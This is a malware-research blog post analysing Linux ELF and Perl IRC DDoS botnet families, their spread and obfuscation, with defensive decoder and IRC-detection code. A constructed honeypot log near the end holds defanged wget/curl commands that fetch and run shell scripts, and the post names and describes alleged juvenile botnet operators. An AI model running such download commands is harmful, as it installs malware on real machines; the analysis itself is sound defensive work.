Sunday, February 7, 2016

MMD-0052-2016 - Overview of "SkidDDoS" ELF++ IRC Botnet

Tag: kaiten, ktx, tsunami, STD, stdbot, torlus, Qbot, gayfgt, lizard, lizkebab, sinden, sdn, $dn, bossaline, bossabot, dtool, aidra, lightaidra, zendran, styx, Code, Robert, cod, unixcod, styxcod, irc, ircbot, ddos, elfbot, ddoser, nix, elf, linux, unix, backdoor, syn flood, ack flood, ntp flood, udp flood, dns amp, xmas attack, pan flood, x00, cback, LiGhT, Proxseas, BLJ, KaitenBot, fairy, Alex, vanity, Code, Palkia, shenron, GoHack, triple6, 666

Have your own idea, bring your dreams into reality.
Have some fun when you're young, it's all fair with consequentiality.
But you build malware to do vandalism, you cross the line,
Then you hack internet boxes for whatever purpose, it is a crime,
Don't do the crime, if you can't do the time.

Background

This post collects information about infections by the ELF & Perl malware botnets that are being used for DDoS activity. Our intelligence "snagged" the source codes, which we shared and reported to the antivirus and security industry in the previous MalwareMustDie blog post [MMD-0044-2015]. Some recently compiled ELF binaries were coded with slight obfuscation or with a poor "crypting" effort (obviously because the actors are kids who lack knowledge and experience, because they skip school so much and are too lazy to learn); even the toughest crypted ones are crackable, and you can figure them out easily using the source code pattern I shared.

At the bottom of this post there is a list of IP addresses of infector hosts, recorded in early 2016 only. Those are: (1) nodes from "grey" hosters hired by DDoS skiddies to spread these ELF, which are mostly offered in some hacking forums, and (2) hacked servers/routers/IoT/VPS that are being used to spread these ELF malware. Either way, those are bad hosts that should either be blocked before they get taken down, or be cleaned up. Generating IOCs or blocking rules based on this list is highly recommended.

(Pic = A spreader's attack log of an ELF botnet infection)

The intelligence behind this information cannot be disclosed further for security reasons; the data belongs to MalwareMustDie, NPO (thank you for the hard work of our ELF Team teammates) and is bound to our disclaimer. Yet please feel free to use this information for your mitigation work, to extract IOCs to prevent these infections from getting worse, or for research purposes.

(Pic = A spreader's copypasta instructions for SSH infection and for confirming infection by the ELF botnet)

For the record: no malware infection can occur by viewing this post. The information posted is all in textual form and was modified in a way that prevents links to the outside, so it is harmless. Further, this blog is hosted on Google's blog infrastructure (thank you blogger.com) and not on our own servers, and there is no advertisement whatsoever in this blog, to avoid any chance of third-party links being used for malicious efforts by our "unhappy" enemies.

What is the source of these infections

For the ELF type of DDoS malware or botnet, two major versions are used: the kaiten/ktx/tsunami/STD modded base malware and the Torlus (LizKebab/GayFgt/Bashdoor/Bashlite) type. The rest is the Perl "SERVIDOR" malware (Perl DDoS Bot, aka Pbot), which has the same purpose: an IRC-protocol-based remote DDoS command and control scheme to launch DDoS attacks, backdoor activity and further infection. In the next sections I will give you some real samples and sources of this threat that I often tweeted in my timeline.

This post also covers the scheme that is used, the actors, some details of these botnets, and some recent obfuscation. With this background, hopefully we can build a better scheme to reduce the spread, detect the payloads with a better score in antivirus products supporting the Linux platform, and help law enforcement recognize which routes of badness are adrenalizing these hacks.

1. Kaiten/Ktx/Tsunami/STD backdoor/ddos/IRC botnet malware

I wrote a long explanation about ELF/Kaiten (Tsunami) in here-->here.

The recent popular and interesting sample is a kaiten-like botnet that calls itself STD bot. For the historical explanation of STD bot please refer to this link-->here, which explains why I always said STD bot is not Kaiten (Tsunami) from the root of its code. But over time the code was heavily copypasta'd with added kaiten bot code and vice versa, so in the end what many people see now looks like almost the same code in both threats.

Figure: The STD bot's saved variables to connect to the CNC (note: "key" & "pass"), shared for takedown know-how purposes.

The encoded version of ELF/STD bot (kaiten-like family)

There was a chance to find the "encoded version" of STD bot, which was successfully decoded as per the video below (press the menu in the YouTube video for the binary forms BEFORE and AFTER decoding).

Obviously the original code is untouched. Well.. after all, the majority of those hacker actors (from here on called "skids", short for script kiddies, or "SkiDDoS" since their purpose is DDoS activity) can't code much in C and live in copypasta land (copying and pasting code from others without any process via "brains"). You'll see many parts match the original STD bot code..
Again.. see the source codes previously shared with you all in the link above, as reference.

And here's its CNC communication PoC and CNC botnet access details for this version:

Plenty of these "obfuscation" versions are spotted in the wild:

Several combinations you might have seen

We find creativity from SkiDDoS who can code a bit, improving the ancient code to make it more interesting with recent additional features, with the purpose of: (1) obfuscating the threat indicators, (2) modifying the DDoS attack logic to evade blocking/mitigation, (3) improving the main functionality of the ancient works..

Below is another variation, with the Xmas attack..

Some even use a message (again) "copypasta" from the Japanese anime Bakemonogatari:

This type has several modifications, changing strings to make the ELF look like a weird botnet.. which is camouflage for STD bot copypasta too..

Since this type was very interesting at the time it was spotted, and due to its low detection ratio it was actually successfully infecting several routers, I wrote a special post for it due to some requests and an ongoing infection, in MMD-0052-2016, link-->here.

The Sharky type of STD bot

This type is a modded (sort of "modified") STD bot in recent code, compiled in the "usual" way. The actor tends to use STDbot (sometimes along with some script-based IRC botnet). He usually serves the whole CNC (InspIRCd) and the bot client spreader on one single IP address, mostly a compromised server (but sometimes, rarely, via some hosters too).

This is a sample of the Sharky type-->here. The picture below explains how the STD botnet protocol works during the infection; it also contains important information as a tip/hint on how to dissect this type of ELF botnet in general.

2. What good guys call GayFgt/GafGyt/Bashdoor/Bashlite is what these punks call Torlus, LizKebab or Qbot

This malware was first launched on a big scale during shellshock, in September 2014. It was first detected by @yinette in-->here and discussed in-->here; I then analyzed and reported it in a VirusTotal comment in-->here, and made a repository for the malware in kernelmode-->here. At that time I wasn't sure about blogging the threat. We first called it bash0day malware and then switched to bashdoor as the name, and now all of us call it what they wanted it to be called, "GayFgt", as per the hard-coded keyword in the binary. On the dark side of the web they called it Torlus and then Lizard Kebab/LizKebab, along with "other" names to avoid researchers' radar until now..

Unlike the Tsunami descendants, which are very dependent on the existence of an IRC server as CNC and on its protocol, Torlus/LizKebab/GayFgt (etc.) uses a client-and-server set with its own hard-coded protocol, fully inspired by IRC-based commands (which is why they even call the function IRCmain()). Many influences led the coder to this malicious implementation; for example, it adapts the Perl bot's automatic telnet scanner function, aiming for first infection of vulnerable Linux boxes with default passwords.

Picture of an ongoing telnet scanner/bruter recorded by Norse; see which country was targeted..

For one sample of an infection scheme, the binaries and the range of the scanning can be viewed as pasted in here [link]. The telnet scanning is followed by infection of routers using the default passwords set in the code, which are defined in three groups of fields: [root], [login users] and [login passwords].

Telnet scanning is launched after forking has started, upon establishing the torlus/gayfgt server connection:


Figure: Wide range of IoT & router default logins/passwords for telnet bruteforce attacks, used by one Torlus actor in his compiled malware

This malware has various DDoS options, but not as many as STD or Kaiten, because of the malware's dual function as both "spreader" and "flooder". The flood attack of this malware is shown in the picture below:

For the further logic please refer to the source code shared previously.

The origin of the Torlus

This is the original "comment/opinion" taken from the coder of this malware when asked about this threat:

The Original Command List written by the coder of this botnet:

There is even a tutorial made by the coder:

Pastebin is highly useful, isn't it skid?

This is a picture of the gayfgt/torlus coder bragging about his owned nix boxes to get a "buyer"

Well..it seems he was breaking his own rule about screenshots.. :)

The detailed intelligence information on the coder can be found in here-->here.

Torlus/LizKebab, the "Qbot" version:

A group of ELF botnets uses a service based on GayFgt that they call "Qbot":

You may wonder why "Qbot" is used as the name. Seriously, there's nothing special about it. Since the names GayFgt (the string used to confirm an infection), Torlus and Lizkebab were published openly on the wide web, yet the bunch of actors needed a way to refer to this particular malware when communicating with each other, they just made up the name "Qbot" as a reference, along with other names that they use.

Another reason: when the author released the torlus code, the telnet scanning part had a slight bug that could be fixed only by skiddos who can code a bit of C or have a legit contact with the coder, so.. Qbot is how the skiddos refer to the version that is free of the initial bug.

Unlike the initially released Torlus (the lizkebab), which hit a lot of server devices vulnerable to the bash shellshock, mostly servers or client computers running bash, this version is meant to target routers or IoT with binaries for multiple platforms. Since shellshock has been patched in most of the vital services, IoT devices are the leftovers that have either that vulnerability along with insecure default user/passwords left unset during deployment, and mostly their telnet services are open too. So the chance of hitting routers/IoT is getting big, and it is important for these skiddos to have a botnet with many nodes to have powerful flood DoS power.

More illustrated [details1 and details2] on this infection (targeting routers in the USA landscape)

Another illustration:
A skiddos botherder from the US (ISP: ComCast) known by the nickname PacketRate was bragging about his collected modified Qbot version and promoting sales of its service as "SwatNet" with the screenshot below:

Even though the botnet controlled by this kid has a size of 14.5k, it's considerably smaller compared to those of veteran herders. As Qbot targets servers and routers, our devices could be owned by this kid. And all of this for DDoS purposes..

Additional illustration: one real case of GayFgt (Torlus) was designed specifically to infect routers by hacking their busybox, as posted in kernelmode-->here.

A skiddos calling himself "TheVillain" launched a promotion for DDoS as a Service by selling spots on his Qbot:

Torlus/Lizkebab/GayFgt/Bashdoor without Telnet scanning

One day Xylit0l told me to look at a Gayfgt case on kernelmode, which led to this version. This one has no telnet scanner in its setup. I found that this version is based on the private version of the code. The actor seems to be avoiding the traffic "noise" of telnet scanning & bruting. Our intelligence also found that it matched a modified version that was announced by the coder in his "private club". So it runs as a backdoor and acts with 100% remote DDoS bot function. Below are the code screenshots:

I disassembled it as below:

For more details on this version please see the posts in-->here.

Torlus/Lizkebab/GayFgt's server console in action

I call it "in action" because this is actually a copypasta-modified Torlus server side renamed "Palkia"; the picture was snagged directly from a skiddos who bragged about it:


BLJ and the Torlus/Lizkebab/GayFgt/Bashdoor/Bashlite in encoded form

Playing around with this new sample-->sample thread=16&t=3505#pr28248, I found out that the hacktivists have obfuscated the strings in the ELF of the Torlus/Lizkebab/GayFgt/Bashdoor/Bashlite malware. Thank you to the good person who sent this sample directly to us.

This piece of malware was coded based on the original Torlus client; inside those garbled codes it was in encoded/string-obfuscated form, stripped, and distributed with no Intel architecture samples.. which is fine for all of us :-) since my major reverse engineering is for UNIX embedded devices anyway.

The "encoding" goes on both sides: the client and the server version.

After decoding, with all strings loaded in memory, the functionalities run as usual; here's the telnet scanner part as per the PoC below:

This type of "crypted" version (example: the BLJ type sample-->here) is also the persistent model of Torlus, by its installation as autostart in the user's crontab.

Tip to all good folks reversing some of these crypted variants in the future. The points of difference are as follows: 1. the forks run before decryption; 2. syscalls are stripped but all are torlus' ones; 3. a hint: aim at the args, which they can never hide; 4. put them back together & you'll see the torlus/lizkebab/gayfgt code as it is.

For the decryption of the GayFgt/Torlus/LizKebab BLJ crypted version, I made a guide/hint video that hopefully can help others dissect this version:
*) Note: See this video in fullscreen & HD mode

The Linux versions of AV have a bad detection ratio:

A message to skids who use this version: "Try harder! :)"

The Linux/GayFgt distribution via vulnerable WebApps also exists

Most of the infections by GayFgt or Kaiten use hacked credentials for Linux boxes; however, it is not always like that. We spotted the first large distribution in September 2014 during the bash "shellshock" exploitation; after that, default credentials for busybox were targeted; later on they started to target all IoT platforms with default credentials, and then they also hacked FTP accounts with weak credentials; and recently CMS/WebApps with vulnerabilities are targeted too to spread these ELF malware. One proof is the case we screenshotted on a hacked WordPress site:

3. The infamous legendary "Servidor" family IRC Perl DDoS bot (Pbot)

We have all been seeing this threat for a long time, but recently this DDoS script is heavily used as an "alternative" to infect IoT for DDoS purposes, in case the ELF malware cannot be run or executed on the platform targeted by the hackers. Here's the proof in-->here

Historically, the Perl DDoS IRC bot (in short: PBot) is not a new problem, and we can see many of them on compromised sites or FTP servers. I covered those in previous posts about FTP adventures in-->[-1-] and [-2-]. Even though there seem to be many types of them, there are only two or three workable codes; the others are basically just "copypasta" combinations of those codes. Even though the Perl DDoS threat is old, the recent findings have much "improvement" in distribution and usage, in protecting the players' control of their bots, and in camouflage to avoid online scanning tools.

Why Perl? Why not PHP, or something else like Python or Ruby? Some routers need CGI to operate the user interface, and many router distributions (still) prefer to have a Perl interpreter as that interfacing language. Likewise, most servers have Perl for executing maintenance-level scripts, say /etc/init.d/update-rc.d for example. I have not checked the detailed statistics yet, but there were so many infections hitting IoT and servers with Perl backdoors instead of ELF during the shellshock boom era. In short, if ELF doesn't run, the Perl bot might do the job; that is why they still use this type of bot, as a companion or even the main course. In addition, it doesn't take much effort for a skiddos actor to modify a Perl script.

One major type of this Perl DDoS bot is the "Servidor" type, which was originally coded with variables and comments in Portuguese. Some typical parts of this Perl DDoS bot are as per the snippet below:

This version has been put through "plastic surgery" to look like some other original work, and modified with many new "copypasta" functions, to look something like the picture below, which the copypasta actor/coder named Perl DDoS IRC bot or other generic variant names.

The thing about Perl code is that it is readable, so what the hacktivists do is obfuscate the text parts as much as possible to hide their server's information. In this case it is the use of "hexed text" for obfuscation. Other variations of obfuscation (not so many) have been spotted too.
A code snippet for the threat:
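
How "hexed text" can be reversed during triage, shown as an added example that is not code from this post or from any bot. The Perl fragment embedded in it is constructed, and its variable names, host, port and channel are placeholders.

```python
import re

# Perl accepts both \xNN and \x{NN} inside double-quoted strings.
HEX_ESC = re.compile(r"\\x(?:\{([0-9A-Fa-f]{1,2})\}|([0-9A-Fa-f]{2}))")
# A double-quoted string literal, allowing backslash escapes inside it.
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')
HOST = re.compile(r"(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}|\d{1,3}(?:\.\d{1,3}){3}")


def decode_hexed(text):
    """Replace every \\xNN / \\x{NN} escape with the character it encodes."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def label(value):
    """Rough guess at what a decoded string is used for (heuristic only)."""
    if value.startswith("#"):
        return "channel"
    if value.isdigit() and 0 < int(value) < 65536:
        return "port"
    if HOST.fullmatch(value):
        return "host"
    return "string"


def reveal(script, min_escapes=4):
    """Return (line_no, kind, decoded) for strings built mostly from hex escapes.

    min_escapes keeps ordinary strings with a stray escape out of the report.
    """
    findings = []
    for line_no, line in enumerate(script.splitlines(), 1):
        for match in STRING_LIT.finditer(line):
            raw = match.group(1)
            if len(HEX_ESC.findall(raw)) >= min_escapes:
                decoded = decode_hexed(raw)
                findings.append((line_no, label(decoded), decoded))
    return findings


# Constructed sample, not taken from a real bot; all values are placeholders.
SAMPLE = r'''#!/usr/bin/perl
my $servidor = "\x69\x72\x63\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64";
my $porta    = "\x36\x36\x36\x37";
my @canais   = ("\x{23}\x{62}\x{6f}\x{74}\x{73}");
my $versao   = "v1\x2e0";
'''

if __name__ == "__main__":
    for line_no, kind, value in reveal(SAMPLE):
        print(f"line {line_no}: {kind:8} {value}")
```

The decoded host, port and channel are the values to feed into blocking rules and takedown reports.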

The flexible obfuscation of the "servidor" Perl IRC DDoS botnet (PBot) as a backdoor has a very long history too. Another example: after the PHPMyAdmin (PMA) remote execution exploitation was found in the wild, the GayFgt/Torlus coder purposely released a tutorial to set up a PMA exploit botnet with a PHP toolkit, advising the download of a package containing a Perl script to be executed as instructed in the tutorial.

What was not said in the tutorial is.. during the execution, another "unmentioned" base64-encoded component file, which actually contains the "Servidor" Perl Bot (PBot) code, is executed too, and that was obviously made to backdoor the person actually using the tutorial. Servidor (Pbot), and "IRC botnets" in general, were proven to be flexible and easy to use for hacking/backdoor purposes. Here's the screenshot of that code:

How PerlBot/Pbot was applied as a backdoor in the PHP botnet toolkit to hack PMA sites.. skiddos are rude, aren't they? :)

An example CNC of these Perl IRC botnets is shown in the picture below, where the owner of a large Perl botnet, calling himself "GoD", bragged about his stuff:

An infection set for these "servidor" Perl DDoS'ers is as widely applicable as that of ELF Torlus (GayFgt) or ELF Kaiten/STD. The SkiDDoS can set the attacker's IP (they call it the "spreader") to a certain IP while serving the Perl DDoS payload together with some ELF ones on another IP, and all of them (Perl & ELF) can use & share the same CNC on yet another IP too. They (skids) like to switch or combine between those IPs, and it is important for us to clean up all of the nodes used in a chain of infection. Below is real case data for such a scenario:

If you spot this type of script please try to get the information below:


This is valuable information for "securing" such compromised/CNC-utilized servers.

There are also other types of Perl DDoS scripts that are privately distributed between "fellow hacker teammates" only, which were specifically built for the desired combination of flood attacks thought to be "effective" according to the coder/user's preference. The Perl script below is an example:

*) Note: See the "skype" part in the code. You think what I am thinking?

Some crooks in Lizard Squad, despite using their ELF DDoS (GayFgt/Torlus/LizKebab), also have their own private version of a Perl DDoS script, which seems to be coded for public use by any other skiddies during the mass operations they run to flood certain big services. This simple script is one of the tools used during their "adventures". It is simply coded in Perl, but I think you can imagine how big a flood of traffic can be generated by a bunch of kids (say.. 30 kids, each having say 3-4 boxes of bots) firing this script on their boxes via the Perl CLI:

4. Screenshots of "other" ELF IRC ddos variants with the same basis

There are plenty more ELF malware threats derived from the IRC-based client-server code. I will give some examples of what was "hot" in the market; these samples were spotted and handled in the wild during our mission in MalwareMustDie of helping to stop the usage of ELF malware, for example:

MuBot, DTool, Lightaidra, Bossabot/Line's tools; below are the screenshots:

Just for the record, a little out of context: during the investigation I accidentally found that Anonymous hacktivists also have their own original DDoS tool, but that one was coded in Visual Studio .NET Framework with Visual Basic :-))

Well, it seems that they put more effort into scripting its ASCII art than into the coding itself :D

Essay: Why is the "kaiten/tsunami" IRC botnet family (still) popular now?

The kaiten/Tsunami malware C code has long been openly shared on many exploit database sites. kaiten.c originated from knight.c, first coded by Bysin (later known as Contem) between around 1999 (or maybe earlier) and 2000. The history of kaiten is explained in here-->here. It is like a handbook for youth hackers or skids to code and build any IRC bot, in this and the previous generation. I asked many times for those codes to be taken down, since I see plenty of kaiten/tsunami variant codes evolving, and hacktivists' malware coders are making modifications to add more features to it every day. This malware is used by some known groups now... By now kaiten/tsunami-based malware is already widely shared and improved, so taking the initial source code down now is just meaningless anyway..

What has happened now: the most powerful DDoS hitting us daily today comes from these ELF botnets, utilizing our NIX boxes and IoT devices to be used against us. The flexibility of this tool is high: you don't need root access to run these malware, and since it is coded in C, you can mostly compile it on the spot with your own downloaded preferred compiler to bypass the NIX system's mitigation scheme on using its own native builder. We have had a boom of traces of these incidents starting in the shellshock era, but back then the variants were not as many as now, when we have about 6++ families (Kaiten/STD/Aidra/LightAidra/BossaLine/Dtool/Torlus or LizKebab) and around 17 variants of codes in the wild, old and new.

Using an IRC bot hides the real actor's connection to the malware implanted in the victim's machine behind a specifically set up IRC server. This is the advantage for those hackers. The bad actor just has to stealthily connect from any different network to that IRC server, which is prepared for botnet operation, and wait until the bot nodes infected by the "spread method" automatically join the authenticated IRC channel. The spreading ways vary; some target busybox devices by hammering their login credentials, or use other malware to hack telnet, like GayFgt/Torlus/Lizkebab.

The hacker can then start to remotely control the activity on the victim's machine, sending via the IRC protocol the commands that execute the malicious procedures coded in each (specific) malware.

The commands sent are simple "IRC messages" with specific, visible textual keywords like: ATK (UDP|SYN|STD|XMAS|PAN), PING, SCAN, SHELL, BCONNECT, MAIL etc. etc.. which can mean something like: attacking other nodes with multiple forms of DDoS, scanning to infect more nodes, getting a shell on the infected machine to be used as a backdoor, getting updates, sending messages and many other malicious routines.
These keywords are received and processed by the ELF malware to run the desired bad activity.
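
One way to turn the keyword list above into detection logic over captured IRC traffic, as an added example that is not code from this post or from any of the bots. The log lines, nicknames and addresses are constructed, and the rule that a keyword sits within the first three tokens of a message (optionally behind `!`, `.`, `@` or `*`) is an assumption of this example.

```python
from collections import namedtuple

# Keywords exactly as listed in the post. Command syntax around them differs
# per variant, so the matching rules below are assumptions of this example.
ATTACK_TYPES = {"UDP", "SYN", "STD", "XMAS", "PAN"}
CONTROL_KEYWORDS = {"PING", "SCAN", "SHELL", "BCONNECT", "MAIL"}
# IRC verbs whose trailing text can carry a herder's message to the bots.
TEXT_VERBS = {"PRIVMSG", "NOTICE", "TOPIC"}

IrcLine = namedtuple("IrcLine", "prefix verb params trailing")
Alert = namedtuple("Alert", "sender target kind keyword")


def parse_irc(line):
    """Split one IRC line of the form [:prefix] VERB params [:trailing]."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    return IrcLine(prefix, parts[0].upper(), parts[1:], trailing if sep else "")


def classify(trailing):
    """Return (kind, keyword) if the message text looks like a bot command."""
    tokens = [t.lstrip("!.@*") for t in trailing.split()]
    for i, word in enumerate(tokens[:3]):
        if word == "ATK":
            # ATK only counts when followed by one of the listed flood types.
            if i + 1 < len(tokens) and tokens[i + 1] in ATTACK_TYPES:
                return "flood", "ATK " + tokens[i + 1]
        elif word in CONTROL_KEYWORDS:
            return "control", word
    return None


def scan_log(lines):
    """Flag command keywords in message bodies, never in protocol verbs.

    A server-level PING/PONG keepalive is normal IRC traffic; only a keyword
    inside PRIVMSG/NOTICE/TOPIC text is treated as a possible bot command.
    """
    alerts = []
    for line in lines:
        msg = parse_irc(line)
        if msg is None or msg.verb not in TEXT_VERBS:
            continue
        hit = classify(msg.trailing)
        if hit:
            sender = msg.prefix.split("!", 1)[0]
            target = msg.params[0] if msg.params else ""
            alerts.append(Alert(sender, target, *hit))
    return alerts


# Constructed capture: documentation addresses, made-up nicks and channels.
SAMPLE_LOG = [
    "PING :irc.example.invalid",
    ":irc.example.invalid NOTICE * :*** Looking up your hostname",
    ":bot1!u@198.51.100.7 JOIN #chan",
    ":herder!u@203.0.113.5 PRIVMSG #chan :ATK UDP 192.0.2.10 80 60",
    ":herder!u@203.0.113.5 PRIVMSG #chan :SCAN",
    ":alice!a@host.example PRIVMSG #linux :can you ping me later?",
    ":herder!u@203.0.113.5 PRIVMSG #chan :ATK now",
    ":herder!u@203.0.113.5 TOPIC #chan :!SHELL uname -a",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Matching is case-sensitive on purpose, so ordinary chat such as "ping me later" does not raise an alert.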

As for the DDoS function itself, it seems that DDoS Stresser Services based on GayFgt/Torlus and then Kaiten/Tsunami are proven to hit harder than similar kinds written in Perl, PHP, Python, Windows DDoS clients (the so-called LOIC of long ago..) or even Chinese-made DDoSer malware. The flexibility in arranging and renting the service per "channel" on their IRC server is the key to its "easy selling", and anyone who can do IRC chat is able to operate these bots to hit whichever targets they are planning to.

The most painful part for a malware coder is maybe creating the CNC communication protocol.. with an IRC bot they don't have to create that protocol, since IRC exists and provides its protocol for the communication, and the Tsunami code has it all and is de facto "open source".

The code of these malware is also simple, and among hackers who mostly share its source codes, any specific modification can be done by themselves if they know a bit about C network programming with TCP/IP and about the IRC protocol.

At this point please don't get me wrong, I am not speaking highly of any malware, and you know well how I hate malware, but IRC-channel-based DDoS is a threat to which we should all start to give more attention and priority.. now, or it's going to be too late.

In a nutshell, where there is no "hacker" who connects to the internet without hiding their real IP, the IRC botnet setup is "heaven" for avoiding a direct trace during the investigation of incidents and the collective effort to gather evidence. The only way to spot the attacker is to get into the IRC server and get the information from that vector only, under some conditions: IF the data is saved or parsed there, or.. if we can gain full access to the host serving the IRCd. If these conditions are met, then most likely we will only see a bunch of IP addresses camouflaged by VPN or Tor connectivity. Yet there is still some know-how that can be used to compromise the CNC server and beat the actors "at their own game", with a method that I cannot disclose further for our own OPSEC reasons.

As for the IRC server itself, they "mostly" use two versions for this purpose (inspircd or unrealircd), which can be deployed lightly on any VPS (rented or hacked), or on *NIX boxes, routers or IoT that were previously hacked and are used for this purpose. Security for it exists: they can authenticate the allowed connections, the server login, the channel to connect to and the specific IRC accountS (note: plural) that are master/slave for the botnet operation. They can set up a hostname in DNS that points to the IRC server, to change its IP with each infection session, and/or use the real IP to set up the server-client infection set itself.

Many schemes can be done. Better yet, the setup of servers to connect to in the kaiten/tsunami code is just unlimited.

So, actually this is a powerful scheme that is being dug into to its utmost right now: a lightweight botnet base for building and re-building, to code and re-code again and again, and a flexible/easy/useful tool for bad people to compromise and then utilize our nodes, especially if IoT nodes are aimed at and targeted. A telnet or ssh scanner function is also spotted in some variants, used to spread to more nodes for infection. In some incidents I faced, the attacker certainly chose to install his prepared ELF Tsunami IRC bot for backdoor/hack purposes along with other hacktools like rootkits.

Moreover, since the detection ratio for ELF malware is not as high as for other forms of executable, simple stripping, packing, obfuscating and encoding of the ELF build will surely drop the detection ratio to a bare minimum. THIS is the fact that you must know. As you can see, all antivirus products depend 100% on samples to detect these ELF. This is unlike Windows malware, where virus protection can have sandboxing or behavior analysis as added value for detection.

Producing tsunami/kaiten ELF malware to attack IoT on multiple CPU platforms is not that difficult: with the same code, all the bad guys need is a cross compiler that can compile the samples to support most IoT processor architectures or operating systems. As proof, below is a sample of a recently detected version showing which router processor architectures are really targeted now:

or..
Then please ask yourself: how many antivirus products can work on all of the platforms targeted by these malware? The most effective protection scheme for this threat is filtration out-of-the-box.

I think this additional section explains much of the worry about this type of malware for the present and the future. We are ignoring a simple code and laughing about it, and becoming weak through our ignorant/arrogant attitude. DO NOT underestimate any threat. Bad people are always lurking around us, and they are learning our weaknesses well. I bet they read this post and try to comprehend this writing more than good people would, too.

In a recent hack case using tsunami/kaiten, some researchers laughed about the actor using tsunami as a backdoor. I felt sad reading that. Again, that is unnecessary arrogance. If you can laugh and think it is that "easy", then go and get the actual bad guy's ID from the trace of his backdoor, which is actually way too difficult under the scheme described above.

This is what the bad guys are actually thinking when choosing the ELF/Tsunami tool: "Who needs a "savvy" backdoor if a simple IRC botnet code can do the job well?"

Who used or coded such malware? The h"E"cktivists? No, these are kids!

I have purposely disclosed publicly the coders and users of kaiten and STD bot, since they are doing their malicious activities openly on the Twitter platform as a communication tool between crooks.. the same platform that our families use and where we communicate with friends. You should know this.

Below are the disclosure details:

OZN, the Canadian kid punk (Ouch!) who coded some kaiten-based botnets and herder of thousands:

This is the coder's picture:

This coder is a Canadian citizen (Ouchh!), a kid; his ID, location, real name and evidence related to his activity in the new DDoS operation "Shenron Stresser" (Ouch!), along with its environment, have already been reported to law enforcement. If you still think THIS-->(link) kid is innocent, see the captured communication below:

The customers of this coder are the actors who distribute the malware onto hacked routers/IoT/VPS/servers to serve as DDoS attack cannons. One of the "customers" is still active EVEN TODAY: a Netherlands punk-boy "AntiChrist" (aka Reverser/NoHacker/Nixman, plus some of his active handle names on Twitter) [LINK for report => HERE and HERE], known as the lizard DDoS stresser admin [Proof => HERE], one of the lizard (read: loonies) squad hacker gang activists, responsible for many DDoS attack efforts and hacking incidents.


Another botnet coder-->here, and a kaiten bot herder-->here, and then a user/actor-->here, and his comrade actor-->here.

And there is also another IRC ELF malware herder using kaiten. If you saw the picture above-->here.. well, this is the guy responsible; his botnet's ELF payloads are well known by the "BLJ" or "Dongs" initials..

I think many ELF malware researchers have seen this type already too :-)

Please note that the description "Security Enthusiast" or "Developer" is used in his profile, as many other skiddos like to use attributes such as "Reverser", "Malware Analyst/Researcher" and "Security Beginner". FYI: the Cloudflare service is heaven for these punks to park on; an anti-DDoS service used by DDoSers.. what an irony..

..by the way, talking about Cloudflare was used protecting DDoS attacker service, see below↓

These kids are showing off openly of what they are doing in herding their botnets, like the one with the twitter profile below:

↑This UK boy (from Ballymena city) is showing off in his twitter profile (Ouch!!) the ELF botnets entering the CNC of IRC server actually, let's see that picture in close up:

It is showing the multiplatform ELF Linux malware botnet client malware that successfully infected the target and making a callback to the IRC botnet server, it is showed clearly with the name of platform sent via the chat protocol shown in the picture as ARM, MIPS, SH, etc. You will be very surprised if you see how young the picture of this kid is..

One more skiddos, a young boy from US, even openly use GitHub and PasteBin for his own developed code to DDoS, hack BusyBox routers/IoTs, and other offensive codes:

Don't ever believe if was said such codes (see below) are used for the "research" purpose..

The actor's information is as per below, pic can be seen here-->Ouch!

...and we have nailed the IDs of more actors (i.e. Ouch!) (we count that ID data for 12+ more have been successfully collected now). The majority of these actors are kids "gone wild". Their parents are not controlling (nor caring about) what they are doing anymore, and they think that if they cover their traces well the law cannot touch them since they are only (masked) "naive young children".

For the IOC: the report of infections from 1st Jan - Feb 7th 2016 (warning: it is outdated)

1. The summary:

Malware binary types: ELF/multiple architecture
Malware type: GayFgt(LizKebab), Kaiten (STD/Mod)
Suspected actors: Lizard Stresser rings, aka: Sindicate, "Loony" Squad, and so on.
Total attempts: 1,158
Main download method: wgxt
Alternative download: cuxl; xxtch ; xxx-xxwnload
Download source per country:
  ------------------------
  No  Country      Count
  ------------------------
  1.  United States  39
  2.  Netherlands    12
  3.  United Kingdom 4
  4.  Latvia         3
  5.  France         3
  6.  Ukraine        1
  7.  Romania        1
  8.  Singapore      1
  9.  Poland         1
  10. Sweden         1
  11. China          1
  12. Russia         1
  13. Germany        1
  14. Moldova        1
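
The summary figures above (attempt total, main and alternative download tools, source hosts) can be recomputed from honeypot log lines in this post's `timestamp | command` layout, defanged URLs included. The following is an added example, not the author's tooling; the function names are assumptions and the sample lines are constructed with documentation addresses rather than real indicators.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in the post's "timestamp | command" layout. Hosts are
# RFC 5737 documentation addresses and a reserved example domain, not IOCs.
SAMPLE_LOG = """\
2016-02-06 15:03:38 | wget -q hxxp:// 192.0.2.88/Bots . sh;
                              curl -O hxxp:// 192.0.2.88/Bots . sh
2016-02-06 14:19:15 | wget ftx://198.51.100.237/gtop . sh
2016-02-05 16:35:55 | wget hxxp:// 203.0.113.239/gb . sh-O /dev/gb . sh
2016-02-05 16:53:47 | wget hxxp:// "www.example.com"/rd/rd . sh-O /tmp/rd . sh
2016-01-25 17:10:36 | wget -q hxxp:// 192.0.2.205/bin . sh;
                              fetch hxxp:// 192.0.2.205/bin . sh;
                              lwp-download hxxp:// 192.0.2.205/bin . sh;
                              curl -O hxxp:// 192.0.2.205/bin . sh
2016-01-25 17:07:52 | wget hxxp:// 198.51.100.237/gtop . sh
"""

ENTRY_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \| (.*)$")
URL_RE = re.compile(r"\b(hxxps?|ftx|https?|ftp)://([A-Za-z0-9.-]+)(/\S*)?", re.I)
SCHEMES = {"hxxp": "http", "hxxps": "https", "ftx": "ftp",
           "http": "http", "https": "https", "ftp": "ftp"}


def normalise(cmd):
    """Undo the defanging used in the log so URLs can be parsed."""
    cmd = re.sub(r"\s+\.\s+sh\b", ".sh", cmd)   # "gb . sh"     -> "gb.sh"
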